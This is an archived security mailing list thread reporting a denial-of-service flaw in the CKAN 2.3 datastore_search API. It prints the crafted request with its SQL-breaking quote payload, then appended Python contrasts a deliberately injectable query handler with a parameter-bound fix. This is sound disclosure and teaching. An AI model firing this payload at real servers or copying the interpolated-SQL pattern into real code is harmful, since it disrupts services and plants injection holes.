[CKAN-Security] Fwd: Re: CKAN v2.3 : DoS vulnerability with API
judicael.coryn at amicam.cnafmail.fr
Mon Jul 20 15:10:17 UTC 2015
Hello,
We identified that CKAN is prone to a DoS when a JSON query is specially
crafted and POSTed to the API function datastore_search.
We sent the request 5 times to the first server and ten times to the
second, and we found both servers returning only HTTP 500 responses.
An example of a request that we used to crash our servers:
==============================================================================================================
POST /api/3/action/datastore_search HTTP/1.1
...SNIP...
{"resource_id":"a1ab0ba7-856e-42cd-9e17-2467ae0c0bb2","q":"') query2,
plainto_tsquery('english',","filters":{},"limit":"100","offset":"0","sort":"Deplib')
asc"}&fq=1
==============================================================================================================
We expect that the three characters `') ` (single quote + closing
parenthesis + space) placed in the 'q' and 'sort' parameters generate this
threat.
Best regards,
Judicaël CORYN
tel: 02.43.61.33.04
judicael.coryn at amicam.cnafmail.fr
mobile: 06.24.19.10.05
To help protect the environment, please print this email only if
necessary.
----- Forwarded by Judicael CORYN/AMICAM/CNAF on 20/07/2015 15:53 -----
From: Adrià Mercader <adria.mercader at okfn.org>
To: "CKAN Security Alerts/Discussions" <security at lists.okfn.org>,
judicael.coryn at amicam.cnafmail.fr,
Date: 20/07/2015 11:33
Subject: Re: [CKAN-Security] CKAN v2.3 : DoS vulnerability with API
Hi Judicaël,
You can send the details to the list, and we will discuss the best
approach on the weekly development meeting.
Thanks
Adrià
On 20 July 2015 at 09:53, <judicael.coryn at amicam.cnafmail.fr> wrote:
Hello,
We have discovered, during a black box pentest in our company, the
possibility to crash the CKAN server. It's possible to make a DoS with one
CKAN API function.
How can we report this issue to you?
Best regards,
Judicaël CORYN
tel: 02.43.61.33.04
judicael.coryn at amicam.cnafmail.fr
mobile: 06.24.19.10.05
To help protect the environment, please print this email only if
necessary.
_______________________________________________
CKAN security
https://lists.okfn.org/mailman/listinfo/security
https://lists.okfn.org/mailman/options/security/adria.mercader%40okfn.org
Repo: https://github.com/ckan/ckan-security
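The reporter's guess that the three characters `') ` in `q` and `sort` are what trigger the HTTP 500 responses describes the classic symptom of a request value being spliced into SQL text: the quote ends the string literal early, the statement no longer parses, the database raises an error, and an unhandled error becomes a 500. The following is an added example written for this page, not code from CKAN or from the reporter. It models a hypothetical handler that splices `q` and `sort` into SQL beside a hardened version that binds `q` as a parameter and validates `sort` against an allowlist, using an in-memory SQLite table with made-up columns in place of PostgreSQL and `plainto_tsquery`. Whether CKAN 2.3 actually built its query this way is not established by this thread; the `handle_request` status mapping is likewise an illustration, not CKAN's API layer.

```python
import sqlite3

# Constructed sample data standing in for a DataStore resource table.
# The column names are invented for this example; they are not CKAN's.
ROWS = [("Deplib", 1), ("Paris", 2), ("Lyon", 3)]
ALLOWED_SORT_COLUMNS = {"name", "n"}

# The q and sort values from the reported request, verbatim.
PAYLOAD_Q = "') query2, plainto_tsquery('english',"
PAYLOAD_SORT = "Deplib') asc"


def _open_db():
    """Build a throwaway in-memory table (assumed schema, not CKAN's)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE resource (name TEXT, n INTEGER)")
    conn.executemany("INSERT INTO resource VALUES (?, ?)", ROWS)
    return conn


def search_interpolated(q, sort):
    """Hypothetical weak handler: q and sort are spliced into the SQL text.

    A q containing ') terminates the string literal early, so the whole
    statement fails to parse and the database raises an error.
    """
    sql = ("SELECT name, n FROM resource WHERE name LIKE '%{}%' "
           "ORDER BY {}".format(q, sort))
    conn = _open_db()
    try:
        return conn.execute(sql).fetchall()
    finally:
        conn.close()


def search_bound(q, sort):
    """Hardened handler: q is a bound parameter, sort is validated.

    Identifiers cannot be bound as parameters, so the sort column and
    direction are checked against allowlists before being placed in SQL.
    """
    column, _, direction = sort.strip().partition(" ")
    direction = (direction or "asc").strip().lower()
    if column not in ALLOWED_SORT_COLUMNS or direction not in ("asc", "desc"):
        raise ValueError("invalid sort parameter: %r" % sort)
    sql = ("SELECT name, n FROM resource WHERE name LIKE ? "
           "ORDER BY {} {}".format(column, direction))
    conn = _open_db()
    try:
        return conn.execute(sql, ("%" + q + "%",)).fetchall()
    finally:
        conn.close()


def handle_request(impl, q, sort):
    """Map a handler's outcome to an HTTP-style status, as an API layer might.

    A database error escaping the handler is what surfaces as HTTP 500;
    a validation error is reported back to the client as 400 instead.
    """
    try:
        return 200, impl(q, sort)
    except ValueError as exc:
        return 400, str(exc)
    except sqlite3.OperationalError as exc:
        return 500, str(exc)


if __name__ == "__main__":
    for impl in (search_interpolated, search_bound):
        print(impl.__name__, handle_request(impl, "Par", "name asc"))
        print(impl.__name__, handle_request(impl, PAYLOAD_Q, PAYLOAD_SORT))
```

Run stand-alone, the interpolated handler returns 200 for a benign search and 500 for the reported payload in either `q` or `sort`, while the bound handler returns an empty 200 result for the payload in `q` and a 400 for the payload in `sort`. The point for a reviewer is that the quote in `q` is harmless once it is a bound parameter, and that `sort`, which cannot be bound, needs a column allowlist rather than escaping.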
More information about the Security mailing list